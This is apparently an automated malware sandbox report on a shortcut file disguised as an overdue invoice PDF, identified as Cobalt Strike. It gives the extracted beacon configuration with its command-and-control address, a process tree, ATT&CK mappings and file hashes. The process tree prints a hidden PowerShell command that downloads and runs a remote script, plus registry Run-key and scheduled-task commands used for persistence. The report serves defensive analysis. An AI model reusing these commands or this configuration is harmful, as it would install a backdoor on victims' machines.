Overview

overview

10

Static

static

1

Overdue_In...df.lnk

windows7-x64

3

Overdue_In...df.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    123s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-02-2023 16:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Overdue_Invoice_2023.pdf.lnk

  • Size

    1KB

  • MD5

    65247221e9addff22b50070ba1893bb6

  • SHA1

    e373bac187d3faeba2d13cb5cf284b79c10f7d0c

  • SHA256

    9e9262ab44b3df0478357a790aa39abae9217e74349758e39db4bd7064597875

  • SHA512

    a1a864489b98ddee67c21ee9014a6d3e44b1fd8790af9421b9d9515df7e06d6dbafc85b464424a51a48742d035ba25e423f8edb295107df5badc90c17e1babab

Score
10/10
cobaltstrike987654321backdoorpersistencetrojan

Malware Config

Extracted

Family

cobaltstrike

Botnet

987654321

C2

http://45.12.253.139:443/an.js

Attributes
  • access_type

    512

  • beacon_type

    2048

  • host

    45.12.253.139,/an.js

  • http_header1

    AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAE0FjY2VwdC1FbmNvZGluZzogYnIAAAAKAAAAFkFjY2VwdC1MYW5ndWFnZTogZW4tVVMAAAAHAAAAAAAAAA0AAAADAAAAAgAAABp3b29jb21tZXJjZV9pdGVtc19pbl9jYXJ0PQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAAEAAAABpIb3N0OiBidXNpbmVzc3NlcnZpY2VzLmNvbQAAAAoAAAARQ29ubmVjdGlvbjogY2xvc2UAAAAKAAAAGUFjY2VwdC1FbmNvZGluZzogZ3ppcCwgYnIAAAAKAAAAL0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkAAAABwAAAAEAAAANAAAAAwAAAAIAAAAIZGV0YWlscz0AAAAEAAAABwAAAAAAAAADAAAAAgAAAA5fX3Nlc3Npb25fX2lkPQAAAAYAAAAGQ29va2llAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • jitter

    9472

  • polling_time

    55991

  • port_number

    443

  • sc_process32

    %windir%\syswow64\dllhost.exe

  • sc_process64

    %windir%\sysnative\dllhost.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMEuNG3asVOp+bgSmSog10bB55R9e+aj5dF2sVbnRjA/dTkltRdDD0DdF5vJh/gURBikZ4FxqqmfqR2SPAheOzDDrYvV7ScpwPkZe8IUd/DbJmPs30ST9SGHn+eLjTQQEU+I142t7yTsO7HCKf1CTDMHfS3PNoz3V8ivNRwL1aiQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    9.63976192e+08

  • unknown2

    AAAABAAAAAIAAANxAAAAAwAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /ch

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/42.0.2311.135

  • watermark

    987654321

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/f4Ag4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4652
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Invoice.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2764
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1440
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FA3F0DA423D58F000F00BB4C8644823C --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              6⤵
                PID:3084
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E1A1D12CB97133028473753CE707BFB7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E1A1D12CB97133028473753CE707BFB7 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:1
                6⤵
                  PID:4516
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3267DEC68BC5B289D34F6968C47867D3 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3267DEC68BC5B289D34F6968C47867D3 --renderer-client-id=4 --mojo-platform-channel-handle=2152 --allow-no-sandbox-job /prefetch:1
                  6⤵
                    PID:4872
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=322335C1F8CBAA6E215F2FBE75B5A4EF --mojo-platform-channel-handle=2540 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    6⤵
                      PID:816
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=07F591F1868D2CD43F73208616567444 --mojo-platform-channel-handle=2864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      6⤵
                        PID:3696
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43A37E805A03BCF90F1ACE7814341232 --mojo-platform-channel-handle=2796 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:4316
                    • C:\Windows\SysWOW64\attrib.exe
                      "C:\Windows\system32\attrib.exe" +h C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc
                      4⤵
                      • Views/modifies file attributes
                      PID:2316
                    • C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe
                      "C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe"
                      4⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      PID:3392
                      • C:\Windows\System32\cmd.exe
                        /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
                        5⤵
                          PID:3644
                          • C:\Windows\system32\reg.exe
                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftLibrary /t REG_SZ /d "powershell.exe -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe"" /f
                            6⤵
                            • Adds Run key to start application
                            • Modifies registry key
                            PID:1240
                        • C:\Windows\System32\schtasks.exe
                          /F /Create /TN Microsoft_Library /sc minute /MO 80 /TR "powershell.exe -WindowStyle hidden -noP -sta -w 1 Set-Location -Path $env:Public\Libraries\MicrosoftLibrary; Start-Process $env:Public\Libraries\MicrosoftLibrary\RuntimeBroker.exe
                          5⤵
                          • Creates scheduled task(s)
                          PID:4468
                • C:\Windows\Explorer.EXE
                  C:\Windows\Explorer.EXE
                  1⤵
                    PID:2556
                    • C:\windows\system32\wermgr.exe
                      "C:\windows\system32\wermgr.exe"
                      2⤵
                        PID:3936

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Initial Access

                    Execution

                    Scheduled Task

                    1
                    T1053

                    Persistence

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Scheduled Task

                    1
                    T1053

                    Hidden Files and Directories

                    1
                    T1158

                    Privilege Escalation

                    Scheduled Task

                    1
                    T1053

                    Defense Evasion

                    Modify Registry

                    3
                    T1112

                    Hidden Files and Directories

                    1
                    T1158

                    Credential Access

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    3
                    T1082

                    Lateral Movement

                    Collection

                    Exfiltration

                    Command and Control

                    Impact

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      f26d40f3fe3b07202462281e3520a8a5

                      SHA1

                      38c528ce4457b2bb1fd9aa18597275e4ca6492ef

                      SHA256

                      a556110b4c51077cba0f523c08060bb41b3380751311f47f3da03de9cf20bf84

                      SHA512

                      2a9af331837bc09e21f06aab4b6ad2a532defd5e0719fe42ea73e5cd44e6262eb2f8df46c07b843d46d457737eceec716829f3a3f7a5fa94282f420ddaed5de4

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe
                      Filesize

                      100KB

                      MD5

                      ba4cfe6461afa1004c52f19c8f2169dc

                      SHA1

                      ab8539ef6b2a93ff9589dec4b34a0257b6296c92

                      SHA256

                      e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628

                      SHA512

                      2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\RuntimeBroker.exe
                      Filesize

                      100KB

                      MD5

                      ba4cfe6461afa1004c52f19c8f2169dc

                      SHA1

                      ab8539ef6b2a93ff9589dec4b34a0257b6296c92

                      SHA256

                      e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628

                      SHA512

                      2c5190d7609767237311260f241c619b82434ca640f396bb9710d356286844f82f320f9e05525a38707f2a52977790c0c3e2a217b36a7f0095a87c138b939af0

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\UMPDC.dll
                      Filesize

                      391KB

                      MD5

                      1570c92c1c5f039c438295ac68ff7e82

                      SHA1

                      3ee6c1d3582361e8af4efec44b1d1420494ab728

                      SHA256

                      b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4

                      SHA512

                      fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\info.txt
                      Filesize

                      174KB

                      MD5

                      84b90b27b759c98f05d35e2936939ea2

                      SHA1

                      0a398991b1559455da5333b696da112af07f028e

                      SHA256

                      161854614e6405d6899e19409cee5fc8b08fc08a0c52c208593c059f93b869f8

                      SHA512

                      b1aa38152af47a156a426794d2d2a4560a736ff7447a54327df629bb9e09c8a22d54360615dc73ba4ed435c188a2b07d13962b6823a30bc1a8c0647d0e64e564

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\a43ed813-5e6c-4d34-81fb-5c8d7c1b5ecc\umpdc.dll
                      Filesize

                      391KB

                      MD5

                      1570c92c1c5f039c438295ac68ff7e82

                      SHA1

                      3ee6c1d3582361e8af4efec44b1d1420494ab728

                      SHA256

                      b41b4e32607a4e21593332da63ce1bcf9c1d43f8f6754789a43bea7428833ea4

                      SHA512

                      fbf28062d81538f814e1a615caf9993aa24e54fd0b7ff84ead7e22002bac0a4c866d334fd445d6c7844289a7310e82a0febd07d7f02536ea51d11f9f884e4992

                      Download Submit
                    • C:\Users\Admin\Downloads\Invoice.pdf
                      Filesize

                      6KB

                      MD5

                      662e6c1a869b8a4abc54a7ed8bc23088

                      SHA1

                      c16f1dfa1f2488072d87f100a7d11ecaf90ca9d4

                      SHA256

                      15d2050a1a60c36ae602981ac19e371a6fae40aed0f5aee6334fbcc721e5b140

                      SHA512

                      5bd17a8cbbb0a7a9565d434cfc507213c91bfeac4cea6b7ea0908ec71fbbcf9f3956d1b9b6c9059dbd466f5cfa7efa2948bc338a4331401b4c8be1e5343c9c99

                      Download Submit
                    • memory/816-172-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1152-140-0x0000000006230000-0x000000000624A000-memory.dmp
                      Filesize

                      104KB

                      Download
                    • memory/1152-138-0x0000000005D30000-0x0000000005D4E000-memory.dmp
                      Filesize

                      120KB

                      Download
                    • memory/1152-133-0x0000000004990000-0x00000000049C6000-memory.dmp
                      Filesize

                      216KB

                      Download
                    • memory/1152-132-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1152-137-0x0000000005710000-0x0000000005776000-memory.dmp
                      Filesize

                      408KB

                      Download
                    • memory/1152-134-0x0000000005000000-0x0000000005628000-memory.dmp
                      Filesize

                      6.2MB

                      Download
                    • memory/1152-135-0x0000000004E80000-0x0000000004EA2000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/1152-136-0x00000000056A0000-0x0000000005706000-memory.dmp
                      Filesize

                      408KB

                      Download
                    • memory/1152-139-0x0000000007590000-0x0000000007C0A000-memory.dmp
                      Filesize

                      6.5MB

                      Download
                    • memory/1240-187-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1440-157-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2316-156-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2764-147-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3084-159-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3392-186-0x00007FF9239B0000-0x00007FF923BA5000-memory.dmp
                      Filesize

                      2.0MB

                      Download
                    • memory/3392-174-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3644-184-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3696-189-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3936-181-0x00000279FE480000-0x00000279FE4C4000-memory.dmp
                      Filesize

                      272KB

                      Download
                    • memory/3936-180-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3936-182-0x00000279FE740000-0x00000279FE7BE000-memory.dmp
                      Filesize

                      504KB

                      Download
                    • memory/4316-192-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4468-185-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4516-162-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4652-143-0x0000000006FD0000-0x0000000007046000-memory.dmp
                      Filesize

                      472KB

                      Download
                    • memory/4652-150-0x00000000709C0000-0x0000000070A0C000-memory.dmp
                      Filesize

                      304KB

                      Download
                    • memory/4652-155-0x0000000007F40000-0x0000000007F4A000-memory.dmp
                      Filesize

                      40KB

                      Download
                    • memory/4652-154-0x0000000007F20000-0x0000000007F32000-memory.dmp
                      Filesize

                      72KB

                      Download
                    • memory/4652-153-0x0000000007E80000-0x0000000007E8A000-memory.dmp
                      Filesize

                      40KB

                      Download
                    • memory/4652-152-0x00000000076A0000-0x00000000076BE000-memory.dmp
                      Filesize

                      120KB

                      Download
                    • memory/4652-151-0x0000000070B30000-0x0000000070E84000-memory.dmp
                      Filesize

                      3.3MB

                      Download
                    • memory/4652-141-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4652-149-0x0000000007D50000-0x0000000007D82000-memory.dmp
                      Filesize

                      200KB

                      Download
                    • memory/4652-146-0x0000000008300000-0x00000000088A4000-memory.dmp
                      Filesize

                      5.6MB

                      Download
                    • memory/4652-145-0x0000000007310000-0x0000000007332000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/4652-144-0x0000000007380000-0x0000000007416000-memory.dmp
                      Filesize

                      600KB

                      Download
                    • memory/4652-142-0x0000000006E70000-0x0000000006EB4000-memory.dmp
                      Filesize

                      272KB

                      Download
                    • memory/4872-167-0x0000000000000000-mapping.dmp
                      Download